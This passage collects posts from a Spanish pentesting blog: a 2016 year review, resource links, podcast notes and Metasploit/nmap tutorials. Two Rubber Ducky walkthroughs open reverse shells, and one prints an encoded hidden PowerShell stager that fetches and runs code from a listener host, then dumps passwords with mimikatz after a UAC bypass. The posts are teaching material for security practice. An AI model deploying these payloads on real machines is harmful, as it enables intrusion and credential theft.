Ultimo dia del 2016 y como es casi costumbre en el blog damos un retroceso de todo lo que se vino, lo que se hizo, además de las entradas que mas me agradaron realizar a mi persona en las que mas me diverti aprendi y aun mas hice travesuras.


Lo primero este año tuvimos un total de 161 entradas, lastimosamente no llegamos a las 365 entradas y fueron menos que el 2015, mea culpa honestamente debido a que no se dio, por cuestiones laborales, mi estado de salud que anduvo este año sube y baja, la certificación que rendí el eJPT, y por ultimo estos 19 casi 20 días que tome mi vacación en el cual disfrute plenamente del cielo en la tierra, con la mejor compañia RizelTane. (Mira al final del post para comprender a que me refiero)


Este año fue medio flojo, vamos que fue flojisimo, pero no tanto que en el 2013 tuvimos 124 al menos eso me da algo de alivio. Por otra parte las visitas en el blog se dispararón llegamos ya a mas de 1.851.198 paginas vistas, un promedio de 500 visitias diarias aproximadamente actualmente el contador no funciona debidamente por lo tanto no puedo indicar las visitas exactas pero en realidad eso no importa porque basta y sobra la cantidad de comentarios que me agrada ese sube que se tuvo la interacción con todos ustedes que se que los que leen solo un 1% llega a comentar o dar el gracias, que eso motiva a seguir adelante y las visitas tambien. Este año 2016 nuevamente SniferL4bs estuvo presente en los premios Bitácoras pero como los años anteriores no realice ningun tipo de campaña para ser elegido el Presidente electo, ya los que me siguen en Twitter infiero que saben lo que pienso, y algo que dio en el blanco fue don kinomakino en su entrada,  gracias a todos por nominar y apoyar al blog estar alli entre los 50, 100 blogs sube las ganas de seguir realizando las entradas y aprender para compartir, nuevamente gracias.


Este año realizamos algunas entradas mas que entradas fueron series, incluyendo a Eribaldo aka BalderramaEric que nos compartio la serie de Pentesting con Kali la cual inicie en su momento y el termino de realizarlo, y a ello las entradas de Wireless Pentesting, Usb Rubber Ducky que al fin!!! pude realizar las entradas despues de  mas de un año, continuamos con las pruebas y ataques de PowerShell con Empire en este caso la serie de Pentesting con Metasploit, Pentesting con Nmap y como no las dos series que fueron una competencia por mencionarlo así y les hablo de la Guia no Oficial de BurpSuite en Español y la de OWASP Zed Attack Proxy Guide que por cierto esta si esta en ebook, si lo se aun me falta volcar la de BurpSuite hare todo lo posible para que este año que inicia mañana lo tenga lo más antes posible.

A todo ello se creo el Canal de Telegram del Blog, como tambien se comenzaron a realizar los Podcast semanales de seguridad en los cuales vamos abordando diferentes temáticas desde el resumen semanal y de nuez en cuando algunas opiniones personales, que por cierto para el 2017 tengo pensando realizar más emisiones de Dame Una Shell como tambien los Hangouts! que vamos a ir creciendo cada vez un poco más, con la elaboración de videos tutoriales, la subida de los Podcast a YOUTUBE, que por cierto si lo desconoces tenemos los siguientes 


Canal del Blog en Telegram
Canal de Telegram del Blog

Y para terminar y no menos importantes este año le dimos mas caña como lo dicen por el otro lado del charco, a los Retos y Desafios del blog, donde tuvimos varios retos creados por mi persona y un apoyo de Claor que lo armo con la idea de tener un reto para el grupo de Capsulas SI que desde aqui quiero darles las gracias a todos los integrantes del mismo. 





Una vista donde estuve, por ello mencione en su momento que andaba entre el cielo y la tierra! y el gringo maldito no entendio!! que por cierto aqui esta el tweet.


Ojo que este año no salio el Inocente del blog, ya que tuve la necesidad de desconectarme a todos los que siguen el blog los invito a que se unan al mismo como redactores solo ponganse en contacto por el formulario, el blog esta totalmente abierto para todo aquel que desee compartir y crear una comunidad, este nuevo año se viene a la vuelta de la esquina en 24 horas desde este momento ya empezaremos con todo y gracias! por todo el apoyo. 

Regards,
Snifer

Leer Mas
Este bundle nos da 10 Libros sobre PowerShell totalmente gratuitos, aunque no del todo ya que si lo deseas puedes donar la cantidad que gustes y va lo que dispongas a PowerShell.org.


El listado de los libros son los siguientes:

Para verlo click en el boton ;), espero lo disfruten y si tienen disponibilidad aporten con algo, por mi parte abone 10$ un pequeño aporte.

Regards,
Snifer
Leer Mas
Son dos videos, que hoy reiniciando el ritmo del blog venimos a compartir calentando un poco y moviendo el ambiente para las entradas que tendremos de la mano de Eric o eso esperamos heee, ya desde este punto espero en lo personal picar el bicho de curiosear el trabajo de hacer un pentesting con Bash, y aun mas de la mano de Lee Baird que en estos dos videos nos da una perfecta incursion, ambos del mismo evento pero en años diferentes :), gracias a Gonza por pasar el primero en el grupo de Cápsulas SI.

Hack3rcon 3 09 Bash Scripting 101 for Pen Testers Lee Baird


Bash Scripting for Pentesters by Lee Baird


Ya en el blog vimos algo de Pentesting desde la terminal o al menos tocamos un poco en la serie de Terminal Hacking que son unicamente tres las cuales pueden acceder en los siguientes enlaces

Terminal Hacking I - Conociendo la Shell
Terminal Hacking II - Tips y configuraciones para la terminal
Terminal Hacking III - Reconocimiento y Enumeración

Espero sus comentarios de los videos, que les pareció alguna idea para que se realicen entradas en el blog no duden en lanzarlas!  y aun mas en formar parte de la comunidad del Canal en Telegram del Blog.

Regards,
Snifer
Leer Mas
Esta totalmente gratuito, si como lo leen y saben cual es?.
 
Libro Scapy


El dia de hoy al despertar como siempre me pongo a leer twitter y el feed además del correo en el trajin veo que Daniel Garcia aka cr0hn,  libero su libro de Hacking y Manipulación de Paquetes IPV4 con Python y Scapy un libro que le tenia ganas desde hace tiempo recuerdo que tenia que comprarlo y se me hiba mas que todo por cuestión de tiempo, ahora al tenerlo gratuito espero darme el tiempo para leerlo y realizar pruebas, con el fin de aprender e ir compartiendo las pruebas realizadas

El indice del mismo es el siguiente:

  • Introducción a Scapy
    • ¿Qué es Scapy?
    • El modo interactivo
    • Funciones de ayuda
    • Construcción de un paquete básico
  • Uso avanzado de Scapy
    • ¿Qué es un layer?
    • Pila TCP/IP y layers de Scapy
    • Layers más usados
    • Párametros de los layers
    • Modos de envío
    • Análisis de respuestas
    • Lectura de ficheros PCAP
    • Reinyección en modo flood
    • Creación de un nuevo layer
    • Exportar información y creación de gráficas
  • Usando Scapy como librería
    • Funciones y llamadas
    • Envío de información
    • Scapy y multi-threading
    • Interceptación de paquetes y el sistema operativo
    • Logging remoto con Syslog y Scapy
    • Automaton: El autómata de estados finitos de Scapy

Les dejo los enlaces de descarga y desde aquí darle las gracias a Daniel por este regalo de navidad!!

Regards,
Snifer
Leer Mas
En este nuevo podcast hablamos sobre, el leak de Dayli Motion, Yahoo nuevamente en la mira con el robo de contraseñas de sus usuarios de hace 3 años, Russia aprueba una ley contra pirátas informáticos las actualizaciones de seguridad de Microsoft  y más en este nuevo podcast de Dame una Shell.


Como siempre los enlaces y las incrustaciones para el que lo quiera escuchar desde el blog.







Los enlaces y referencias mencionadas en el Podcast

Russia propone 10 años de prision.

Actualización de seguridad para Asterisk
http://downloads.asterisk.org/pub/security/AST-2016-009.html

Ejecución remota de código en ImageMagick Vulnerability Spotlight: ImageMagick Convert Tiff Out of Bounds Write
http://blog.talosintel.com/2016/12/ImageMagick-Tiff-out-of-Bounds.html

Surface Defense Plataforma para animar a realizar DDoS
https://threatpost.com/hackers-gamify-ddos-attacks-with-collaborative-platform/122290/

Auditoria a OpenVPN2.4
https://www.privateinternetaccess.com/blog/2016/12/private-internet-access-funds-openvpn-2-4-audit-noted-cryptographer-dr-m

TU QUE OPINAS? : Gracias por leerme y escucharme, no dudes en comentar y dar tu punto de vista lo mencionado en este podcast es una apreciación personal, lo que se desea es compartir información de una manera mas amena y permitir nutrirnos en momentos muertos.

Regards,
Snifer
Leer Mas
Esta entrada viene mas que todo para dar a conocer y para apoyar el conocimiento y aprendizaje del Framework Metasploit, el cual cuenta con una serie de videos de la mano de Vivekel creador de SecurityTube.


Algunos de los puntos que son tomados en esta serie de videos son los siguientes cabe aclarar que es un poco antiguo por decirlo así ya que se encuentra trabajando con Backtrack y no asi con Kali, ademas de que la versión de Metasploit no es actual pero la idea es que logreos aprender y conocer mas del framework.
  • Meterpreter Basics and Using Stdapi
  • Meterpreter Extensions
  • Database Integration
  • Post Exploitation Kung Fu
  • Post Exploitation Privelege Escalation
  • Backdoors, Pivoting, Port Forwarding
La descarga es aproximadamente 2 GB, los cuales son bien invertidos y descargados.

Nos vemos el dia de mañana con la entrada respectiva.

Regards,
Snifer
Leer Mas
Vimos en la entrada de Pentesting con Metasploit: Workspaces y Escaneo de Puertos con db_nmap & nmap en el cual vimos como usar db_map el cual es como un wrapper del comando nmap por mencionarlo asi ya que con el mismo es posible realizar el barrido como si trabajaramos con NMAP.



En esta entrada lo que veremos es la interacción de Metasploit con NMAP importando los resultados que se obtengan con un escaneo previamente realizado, ademas del como hacer uso del tipo de escaneo IDLE el cual veremos un poco de su origen y conceptos generales del mismo.

Importando datos de NMAP


Ya dicho lo indicado, procederemos a realizar un barrido con NMAP aun segmento de red según las banderas que usemos regularmente en el siguiente ejemplo realizaremos un barrido con la bandera -sS y un -Pn adicional a ello guardaremos el resultado con la bandera -oX por lo tanto si tienes dudas o quieres aprender mas de NMAP tenemos en el blog algunas entradas click aqui para verlas.


snifer@root # nmap -Pn -sS -oX SniferL4bs 192.168.10.1/24

Obtendremos un fichero XML generado con el nombre de SniferL4bs si llegamos a visualizar tendremos el siguiente resultado el cual muestro a continuacion pero el mismo es parcial si no se extendería demasiado.


Antes de todo, para que puedan seguir correctamente esta entrada y lo tomen en cuenta deben de configurar y tenerlo debidamente funcionando metasploit para ello les pido que se dirijan a la entrada de Pentesting con Metasploit: Workspaces en el cual en la primera parte se tiene la configuración y seteo previo.

Una vez configurado y validado que funciona todo bien procedemos a generar nuestro propio workspaces e importamos el resultado de nuestro barrido anterior con el comando.

msf  > db_import NOMBRE_FICHERO.xml

El resultado que nos dara es el siguiente:


Ahora visualizamos los equipos con el comando hosts, y listamos tambien servicios con services lo mismo que hicimos en la entrada anterior de Workspaces y db_map.




Con esto ya vemos que es posible importar los resultados de un barrido con NMAP para usarlos desde Metasploit, lo cual veremos esta semana e iremos aprendiendo mas del potencial de este framework.

IDLE Scan desde Metasploit.

Este tipo de escaneo que es conocido como zombie ya que usamos un equipo de la red interna y a travez de el realizamos el barrido con el fin de saltar la proteccion perimetral implementada por protecciones perimetrales como ser un Firewall, en esta entrada consideraremos lo básico del escaneo, y para cultura general la misma fue implementada en 1998 por Salvatore antirez Sanfilippo, el cual fue el que descubrio este tipo de barrido.

En la siguiente captura se visualiza como trabaja esta técnica, consideramos lo siguiente para entender el barrido es identificar el IPID enviándole un paquete SYN+ACK, con objeto de que éste nos devuelva el paquete RST correspondiente, ya considerando que tenemos ello nos permite usar este equipo y a travez de el realizar el barrido de puertos usándolo como Zombie.

En metasploit contamos con un auxiliar el cual realizar el cual realiza el barrido para identificar este IPID, el mismo es ipdseq.

msf >use auxiliary/scanner/id/ipdseq


Una vez llegamos a tener resultados no indica cuales tiene habilitado , en este caso no me dio ningun resultado debido a que ando en el Hostal y no me salio ningun resultado pero debe de darte el resultado indicando cual cuenta con ello con el siguiente mensaje.

[*] 192.168.10.243  IPID sequence class: Incremental!

Ya posterior a ello y teniendo la dirección IP del ZOMBIE por mencionarlo asi, procedemos  a usar nmap desde metasploit, con el siguiente comando y notarán la diferencia que tenemos ya que un puerto que estaba antes filtrado ahora nos dará como abierto.

msf auxiliary(ipidseq) >nmap -PN -sI 192.168.10.243 192.168.10.100
[*] exec: nmap -PN -sI 192.168.1.243 192.168.10.100
Idle scan using zombie 192.168.10.243 (192.168.10.243:80); Class: Incremental
Interesting ports on 192.168.10.100:


Ya con ello tenemos los resultados respectivos, es cierto que esta entrada sale en Martes espero comprendan que al viajar estuve cansado y me fui directo al sobre, espero les agrade esta entrada y si existe algun error no duden en lanzarlo para corregir.

Regards,
Snifer
Leer Mas
Como todos los viernes, y hoy no sera la excepción venimos con una presentacion de Ben0xA el cual nos presenta una charla en la DerbyCon bajo el título de PowerShell Secrets and Tactics.



La razón de este video es por lo que estuvimos realizando esta semana en el blog fue hablar del Pato y meter de por medio PowerShell algo que queria armar con muchas ganas tiempo atras,  y por cuestiones laborales no me dio para armarlo.



Espero les agrade por mi parte estare viendola y veremos que de nuevo aprendo.

Regards,
Snifer
Leer Mas
En este nuevo podcast hablamos sobre las actualizaciones de seguridad de los navegadores Firefox, Chrome, el parche de seguridad contra Dirty para dispositivos Android, el malware en Android Gooligan, Avast y Eset contra ransomware, ademas del permiso que tiene el FBI para hackearnos, ya entran a tu puerta y hacen lo que deseen y más en este nuevo podcast de Dame una Shell.

Como siempre los enlaces y las incrustaciones para el que lo quiera escuchar desde el blog.





Los enlaces y referencias mencionadas en el Podcast

Foxit actualización.
https://www.foxitsoftware.com/support/security-bulletins.php#content-2016

Mozilla Foundation Security Advisory 2016-92 https://www.mozilla.org/en-US/security/advisories/mfsa2016-92

Firefox código exploit disponible
 https://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html
Lenovo System Interface Foundation Privilege Escalation https://support.lenovo.com/es/es/solutions/LEN_10150

Android Security Bulletin—December 2016 https://source.android.com/security/bulletin/2016-12-01.html

Stable Channel Update Google Chrome
https://googlechromereleases.blogspot.com.es/2016/12/stable-channel-update-for-desktop.html

 More Than 1 Million Google Accounts Breached by Gooligan
 http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/

Herramienta de Eset contra Ransomware Crysis
https://www.eset.com/int/about/newsroom/research/eset-releases-free-decryptor-for-crysis-ransomware/

Obtener datos de Tarjetas de Credito en 6 Segundos
http://eprint.ncl.ac.uk/file_store/production/230123/19180242-D02E-47AC-BDB3-73C22D6E1FDB.pdf
 https://www.youtube.com/watch?v=uwvjZGKwKvY

TU QUE OPINAS? : Gracias por leerme y escucharme, no dudes en comentar y dar tu punto de vista lo mencionado en este podcast es una apreciación personal, lo que se desea es compartir información de una manera mas amena y permitir nutrirnos en momentos muertos.

Regards,
Snifer
Leer Mas
Esta segunda entrada de Rubber Ducky de esta semana veremos un ataque por mencionarlo asi en el cual se hace uso de Metasploit y PowerShell por medio de una automatización realizada en Ruby este script se encuentra disponible en Github realizado por b00stfr3ak con el nombre de Powershell Reverse Rubber Ducky.



En este caso no es un bypass completo de las medidas de seguridad del objetivo, y lo menciono debido a que el dia de ayer en la entrada Ataque y Escalamiento de privilegios (mimikatz) con Rubber Ducky & Empire Framework fue posible realizar un bypass al antivirus y en ningun momento alerto logrando realizar el escalamiento de privilegios sin inconvenientes.

Lo que necesitamos para esta prueba es el Script que se encuentra en el siguiente repositorio.


Como siempre tienen la opción de bajar desde la web en formato compreso y luego hacer todo lo que conllevas o en su defecto con git.

snifer@root:$ git clone https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky.git 

Una vez se descarga el repositorio contamos con el script reverse_powershell_ducky.rb que esta sobre-entendido que se debe ejecutar con Ruby.

snifer@root:$ ruby reverse_powershell_duck.rb  


Si ven en la captura el script nos solicita en cada paso algunos datos los cuales son:

Servidor: En este caso el equipo donde estaremos a la escucha de la shell reversa.
Puerto: El puerto que estaremos a la escucha valga la redundancia.
Generación de BIN.

Y por ultimo y no menos importante el mismo script nos pregunta si configura el listener en el mismo procede a llamar a metasploit y configurarlo el mismo se ve a continuación aqui lo bueno es que manda el mismo en background con el nos permite realizar otro tipo de tareas.


Lo siguiente y no debemos olvidarnos es cargar el bin generado en nuestra Rubber Ducky. (Así es ando reutilizando la imagen de la entrada de ayer.)

Despues que el script realiza su ejecución nos da el resultado que se ve en la siguiente captura.


Para ver las sesiones activas se realiza por medio del comando sessions -l.



Y para interactura y acceder al mismo es con el comando sessions -i (ID  de la sesion).




Como veran ya es posible interactura con el mismo,  ya de aqui depende de como realizar un escalamiento con Metasploit, Pass the Hash de ser necesario. Despues de  un momento el Antivirus salto en la pc como se ve a continuación indicando que se tiene una Amenaza detectada en Memoria.


En una próxima entrada lo que veremos es como realizar el bypass al antivirus, por medio de diferentes tecnicas y pruebas cuando se ejecute nuestro payload espero sea de tu agrado y cualquier duda no dudes en realizarlo en los comentarios.


Regards,
Snifer
Leer Mas
Como se dieron cuenta con el titulo del post hoy abordamos en el blog, un escalamiento de privilegios con mimikatz a travez de Empire Framework, haciendo uso del Pato (Rubber Ducky) como herramienta de ataque por decirlo así, tal cual como hable el dia de ayer en la entrada de Mejorar tu empleabilidad y/o liderar tu propia empresa esta es la entrada que tenia pensado armar.


Herramientas necesarias

Lo que necesitaremos para realizar este ataque por decirlo asi son las siguientes:

               - Un Rubber Ducky
               - Empire Framework
               - Ingenieria Social ?
               - Equipo Windows (Objetivo)

Un punto a tomar en cuenta es que no necesitamos deshabilitar el antivirus ni realizar ningun Bypass en este sentido debido a las bondades que tiene el Rubber Ducky asi que en este caso salte un robotcito el cual actualizado no me dijo oye!!! ni por el firewall ni nada ya verán las razones que se consideraron.

Configuración de Empire

Lo primero que hacemos es ejecutar Empire Framework, la instalación del mismo vimos en una entrada anterior que es Power Shell Empire, como ven en la imagen anterior nos muestra 0 agents y listeners activos. Procedemos  a ejecutar el comando listeners seguido de HELP con el fin de visualizar la ayuda que nos da la herramienta para continuar.


Lo que haremos es ver por medio del comando info que nos muestra las opciones del mismo, en el vemos que tenemos el Nombre (Name) y el Puerto (Port) por lo tanto como Empire tiene algo o bastante parecido con Metasploit para configurar procedemos usar set Port y set Name como vemos a continuación.



En este caso el nombre es RubberDucky y por una simple lógica e idea de posible bypass al firewall que tenga el equipo a atacar se configura al puerto 443, una vez realizado ello vamos para atras con el comando back y veremos que tenemos ya un listener activo.


Configuración y Generación de Rubber Ducky

Ahora lo que tenemos que hacer es configurar el agent por ello  ejecutamos en la terminal de Empire agents e introducimos usestager y al realizar un tab (tabulación) tenemos el listado de  los stagers a usar como veran tenemos para generar un fichero bat, vbs, macro, para teensy y ducky como otros el que nos interesa es el ducky por lo tanto damos usestager ducky.



Notaran que al ejecutar el comando info en el framework nos da las opciones como lo tenemos en Metasploit con show options, si notan tenemos marcado el valor OutFile ademas de ello el Listener que debemos de especificar el creado con anterioridad en esta prueba es RubberDucky.

Para terminar este proceso ejecutamos el comando generate el cual nos generara el fichero en la ruta configurada en OutFile, el contenido generado respectivo lo muestro a continuación

DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
STRING powershell -W Hidden -nop -noni -enc WwBTAHkAUwBUAEUAbQAuAE4AZQB0AC4AUwBlAHIAVgBJAEMARQBQAE8ASQBOAHQATQBBAE4AQQBnAGUAUgBdADoAOgBFAHgAcABlAGMAdAAxADAAMABDAE8ATgB0AEkATgB1AGUAIAA9ACAAMAA7ACQAdwBDAD0ATgBFAHcALQBPAGIASgBFAEMAdAAgAFMAWQBTAHQAZQBNAC4ATgBFAHQALgBXAGUAYgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgARQBBAEQAZQBSAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBPAFgAeQAgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBSAEUAcQBVAEUAcwBUAF0AOgA6AEQAZQBGAGEAVQBsAFQAVwBlAEIAUAByAE8AeAB5ADsAJABXAGMALgBQAFIATwBYAFkALgBDAFIAZQBkAEUATgB0AGkAQQBsAHMAIAA9ACAAWwBTAHkAUwB0AGUATQAuAE4ARQBUAC4AQwByAGUARABFAE4AVABpAEEAbABDAEEAQwBIAEUAXQA6ADoARABlAGYAYQBVAGwAdABOAEUAdAB3AE8AcgBLAEMAcgBlAEQARQBuAFQASQBhAGwAUwA7ACQASwA9ACcAMgBkADQAMwBhADQANABmADUANQAyAGQAOABlADUAYQA3ADIAYQBmAGUAMwA4ADQAZQBhADIANQBmAGMAZAA3ACcAOwAkAEkAPQAwADsAWwBjAGgAQQByAFsAXQBdACQAYgA9ACgAWwBDAEgAQQByAFsAXQBdACgAJABXAEMALgBEAE8AVwBuAGwATwBhAEQAUwB0AHIAaQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMAAuADAALgA4ADoANAA0ADMALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABPAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAEcAVABoAF0AfQA7AEkARQBYACAAKAAkAEIALQBKAE8AaQBOACcAJwApAA== 
ENTER

Una breve explicación?


  • Esperamos 3 segundos antes de que se ejecute el payload.
  • Llama al prompt de ejecutar.
  • Espera 1 segundo.
  • Escribe cmd para llamarlo.
  • Ejecuta la llamada.
  • Espera 2 segundos
  • Comienza a escribir todo el dato que se tiene en la variable String.
  • Ejecuta lo escrito.

Generación y Ejecucion de Payload en la Rubber Ducky


Lo primero que corresponde hacer es generar el bin pasar nuestro script para ello tenemos en esta entrada de Creando nuestro primer Payload, en el mismo tenemos las diferentes opciones para generar nuestro bin que es interpretado por la Rubber Ducky, asi que una vez que lo tenemos listo nos toca pasar el fichero a la memoria y listo para ser enchufado en nuestro objetivo.


Una vez conectamos el Payload comienza a ejecutarse y como era de suponerse esto se visualiza, vale aclarar que se debe de reducir el tiempo de esperar modificar o simplemente con algo de Ingenieria Social charlar a la persona que estamos usando para realizar el ataque y decirle alguna mentira blanca.



 Escalamiento de Privilegios y Obtención de Credenciales


En Empire tenemos que esperar que se ejecute y recibir la conexión respectiva, nos da que el agente a inicializado dando unos valores respectivos del agente, para validar ello procedemos a ejecutar agents y tenemos los datos del objetivo, teniendo La dirección IP, Nombre de la máquina, Usuario, el Proceso que tenemos arraigado, el delay respectivo.



interact Nombre_del_Agente

Lo primero que notamos es que si procedemos a ejecutar mimikatz nos dira que no tenemos los privilegios necesarios aqui viene al rescate EMPIRE con su módulo bypassuac que para el uso es bypassUAC y el nombre de nuestro Listner y veremos el siguiente mensaje el que esta en verde mas la generación de un nuevo Agente con un asterisco asi que este es el que tiene privilegios.


Aqui tenemos un pequeño problema, por decirlo asi el recordar cual de los dos agents que tenemos es el que tiene privilegios o no, en este caso no tenemos mucho por donde perdernos pero que sucede si tenemos mas de un agente como los diferenciamos uno del otro  ya que existe la probabilidad que ejecutemos lo que no debemos en uno u el otro para ello tenemos la opción del RENAME el cual nos permite renombrar el nombre a uno más facil personalizable y descriptivo como vemos a continuación. 


 Pero que sucede si se hubiera ejecutado  mimikatz directo en nuestro primer agent que nos brindo el pato tenemos la siguiente respuesta, que debemos contar con mas privilegios por lo tanto no era posible ejecutarlo, si como lo vieron despues de renombrar recorde que no saque la captura ni la prueba del delito.


Por lo tanto una vez que tenemos ya renombrado en este caso con el nombre de Privilegio lanzamos interact Privilegio y ejecutamos nuevamente mimikatz tras esperar un momento por el delay previamente configurado. 

Veran que nos da los resultados esperando tenemos la contraseñas en texto claro en este caso de un unico usuario, ya viendo para un equipo con mas usuarios o con uno con privilegios administrativos la grande que podemos armar, y para terminar un detalle mas de Empire que con el comando creds nos devuelve una bonita tabla con los resultados de mimikatz.

Con esto damos por terminado la entrada de hoy espero les agrade y no duden en comentar, en proximas entradas explotaremos mas a Empire 

NOTA : Tienes un pato Rubber Ducky? que tal te fue? tu antivirus lo detecto lograste escalar privilegios tienes alguna duda punto a mejorar no dudes en realizarlo.

Regards,
Snifer
Leer Mas
Hoy no pensaba compartir este video, mas bien esta semana compartire entradas referentes a la pequeña Rubber Ducky que por cierto tenemos algunas entradas en el blog, que son Creando mi primer Payload
Conociendo a la USB Rubber y Crea tu propia Usb Rubber Ducky con una USB normal en los cuales vemos como crear un payload, lo que trae  la rubber ducky y como crear nuestra propia rubber, pero creo que esta entrada que tenia pensado para hoy viene mañana ya que por la tarde ya al terminar el trabajo me puse a revisar los videos del Cybercamp de este año,  y me agarro el nombre del siguiente video.




Si el de Mundo Hacker Antonio Ramos, en el cual nos da un vistazo y su vision de como estar en una empresa como liderar una y seguir adelante con todo lo que tenemos sea poco o mucho.



Una charla que me agrado y me encanto asi tambien como la conferencia de Enrique Serrano especificamente de lo importante que es la apariencia, para que los demás nos vean aun más en el mundo laboral, saber vendernos por fuera por todo lo que sabemos el mismo se ve en el minuto 8:18 hasta el 09:45 mas o menos espero que esta semana sea productiva para todos ustedes  y si esta semana estaremos jugando con el Pato, espero conozcan mas de el como yo ando haciendolo.

¿Mas vale ser cabeza de ratón que cola de León?

Regards,
Snifer
Leer Mas
Dia sábado y volvemos con las recomendaciones audiovisuales siendo estas ponencias y retornamos con ello con este video de la mano de Joxean Koret en el cual presento alla por el 2013 la herramienta FUGUE para un análisis estático de vulnerabilidades.


Para aquel que no sepa quien es Joxean, es el creador de Diaphora, Nightmare la primera siendo un differ de binarios y la segunda una herramienta de fuzzing en ambos casos dejo los enlaces respectivos.




Me olvida mencionar que es el co-autor del libro
Image result for The Antivirus Hacker's Handbook



Gracias a SoftDat que compartio el video.
Regards,
Snifer
Leer Mas

Despues de mucho tiempo vuelvo a recomendar un libro en el blog y en esta oportunidad es Coding for Penetration Testers el cual es una primera edición ya que recientemente salio la segunda.

https://images-na.ssl-images-amazon.com/images/I/41BCtXzY7-L._SX404_BO1,204,203,200_.jpg 

Lo que llega a abordar en este libro, es  las etapas de un pentesting por medio de los diferentes lenguaje de Scripting siendo estos Bash, PowerShell, Python, Ruby, Perl pasando por un paso a paso de aprendizaje al menos lo básico de cada uno de ellos llegando hasta la explotación de vulnerabildiades web, les recomiendo que den una revisada y si puedan se nutran de ello que por mi parte andare tocando por Ruby, que se vera en proximas entradas de la mano de Metasploit en realidad de la serie Pentesting con Metasploit.

Buen fin de semana, y a disfrutarlo dejen el ordenador un momento!

Regards,
Snifer
Leer Mas
Veremos en las siguientes entradas como encarar un pentesting con Metasploit, con la siguiente observación que nos saltaremos la parte de conocer el framework, como esta dividido que funcionalidades cuenta y detalles de por medio, ya que de ser necesario y si lo piden podemos armar dicha entrada y postearla, pero en esta oportunidad nos saltaremos y lo daremos por conocido. 



En mi caso hare uso de Kali Linux como Sistema Operativo, la razón de usarla es como hace tiempo hable de porque todos los cursos entradas son de Kali. Lo que haremos primero sera iniciar el motor de base de datos en este caso postgresql con el comando.


root@Snifer:# service postgresql start

Asi tambien tenemos que crear la base de datos, con el comando msfdb init.

root@Snifer:# msfdb init


El resultado se ve a continuación.


Una vez tengamos listo y sin problemas, procedemos a iniciarlizar metasploit con msfconsole, posterior a ello validamos, el estado de la base de datos verificando si la misma esta correctamente inicializada.

root@Snifer:# msfconsole
root@Snifer:# db_status 


Si todo esta bien y sin problemas tenemos el resultado anterior, todo esta perfecto y podremos trabajar sin problemas aqui sucede un detalle, que cuando no se tiene el motor de base de datos arriba y deseamos buscar algun  exploit, auxiliar o payload nos muestra un mensaje que no se encuentra conectado  y tardara la busqueda aparte de ello no es posible hacer uso de los workspace espacios de trabajo y llegar  a guardar nuestros resultados. 

Como mencione anteriormente los workspace son espacios de trabajo que nos permite tener un seguimiento de lo que vayamos a realizar, para conocer las opciones que no da workspace lanzamos el comando de ayuda con la bandera -h como se ve a continuación tenemos el resultado respectivo que nos permite listar, cambiar, agregar, eliminar,  y renombrar.

Por lo tanto lo que haremos es crear un nuevo workspace, como veran este workspace lo llame metasploitable ya que mientras ando realizando esta serie de entradas ire realizando la explotación de algunas maquinas virtuales y en este caso la de metasploitable 2 que en la entrada anterior, comento una persona que desearia verlo el paso a paso de como explotar. 



Una vez se tenga ello listo procedemos a usar el workspace creado con el siguiente comando.


msf > workspace (Nombre del Workspace a usar) 

Una vez tenemos ello  ya es posible trabajar con nuestro workspace,  lo que veremos en esta entrada aparte de configurar sera la ejecucion de NMAP el cual puede ser usado con nmap o db_nmap y las variables respectivas que tengan que usar un ejemplo y haciendo el barrido es el de a continuación.

Posterior a ello listamos los equipos identificados con el comandos hosts que nos mostrara que equipos fueron identificados, como tambien podremos hacer uso de services que nos devolvera la IP puerto y el servicio que fue identificado un ejemplo del mismo vemos a continuación.

Cabe resaltar que hice uso del comando hosts -d IP para retirar el resto de los equipos identificados y solo se muestren los que nos interesan, ademas de ello tenemos en Metasploit los siguientes auxiliares que nos permite realizar un mapeo de puertos, como saben se busca por medio de un termino con search Termino a buscar, en una proxima entradaexplotaremos cada uno de ellos y viendo los resultados.


msf > search portscan

Matching Modules
================

   Name                                      Disclosure Date  Rank    Description
   ----                                      ---------------  ----    -----------
   auxiliary/scanner/natpmp/natpmp_portscan                   normal  NAT-PMP External Port Scanner
   auxiliary/scanner/portscan/ack                             normal  TCP ACK Firewall Scanner
   auxiliary/scanner/portscan/ftpbounce                       normal  FTP Bounce Port Scanner
   auxiliary/scanner/portscan/syn                             normal  TCP SYN Port Scanner
   auxiliary/scanner/portscan/tcp                             normal  TCP Port Scanner
   auxiliary/scanner/portscan/xmas                            normal  TCP "XMas" Port Scanner 

Esto seria todo para esta primera entrada toma de contacto con metasploit y los workspace mas un barrido de puertos con db_nmap
ATENCIÓN: No te olvides que tus comentarios, son tomados en cuenta si quieres algún tema a tratarse mas allá o algo que quedo a medias con gusto lo haremos mas específico.
Leer Mas